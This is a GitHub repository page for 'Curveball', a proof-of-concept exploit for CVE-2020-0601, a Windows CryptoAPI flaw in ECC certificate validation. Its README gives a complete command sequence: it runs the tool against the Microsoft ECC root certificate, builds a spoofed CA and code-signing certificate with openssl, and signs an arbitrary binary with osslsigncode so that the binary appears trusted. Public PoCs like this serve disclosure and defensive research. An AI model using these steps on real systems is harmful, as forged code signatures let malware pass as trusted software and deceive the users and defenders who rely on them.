Skip to content
GitHub no longer supports this web browser. Learn more about the browsers we support.

/ Curveball

PoC for CVE-2020-0601 - CryptoAPI exploit
C C++ Objective-C
  1. C 90.0%
  2. C++ 9.9%
  3. Objective-C 0.1%
Branch: master
Find file
Clone or download

Clone with HTTPS

Use Git or checkout with SVN using the web URL.

Open in Desktop Download ZIP

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio

If nothing happens, download the GitHub extension for Visual Studio and try again.

@ioncodes
ioncodes Merge remote-tracking branch 'origin/master'
Latest commit 6a73108 Jan 29, 2020
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Curveball forgot to call cleanup Jan 28, 2020
images add image Jan 28, 2020
.gitignore it finally works on Windows! Jan 28, 2020
Curveball.sln it finally works on Windows! Jan 28, 2020
MicrosoftECCProductRootCertificateAuthority.cer moved certs and added openssl config Jan 28, 2020
MicrosoftECCProductRootCertificateAuthority_fake.key moved certs and added openssl config Jan 28, 2020
README.md
openssl.conf moved certs and added openssl config Jan 28, 2020

README.md

Curveball

A PoC for CVE-2020-0601. A detailed blog post can be found here. This exploit allows you to create a fake trusted certificate by abusing how CryptoAPI handles certain parameters on ECC based certificates.

Setup

Clone the repository and open it in Visual Studio 2019. Switch to Release and compile it. You can find prebuilt binaries here.

Usage

.\Curveball.exe MicrosoftECCProductRootCertificateAuthority.cer MicrosoftECCProductRootCertificateAuthority_fake.key
# in linux bash (you can also use Windows but you'd have to get an alternative for osslsigncode). WSL on Windows works fine.
openssl req -new -x509 -key MicrosoftECCProductRootCertificateAuthority_fake.key -out trusted_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl.conf -reqexts v3_cs
openssl x509 -req -in cert.csr -CA trusted_ca.crt -CAkey MicrosoftECCProductRootCertificateAuthority_fake.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl.conf -extensions v3_cs
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile trusted_ca.crt -name "Code Signing" -out cert.p12
./osslsigncode sign -pkcs12 cert.p12 -n "Signed by Layle" -in <BINARY_TO_SIGN> -out <SIGNED_BINARY>

Result

Note that the 7zip installer is usually not signed!

trusted

You can’t perform that action at this time.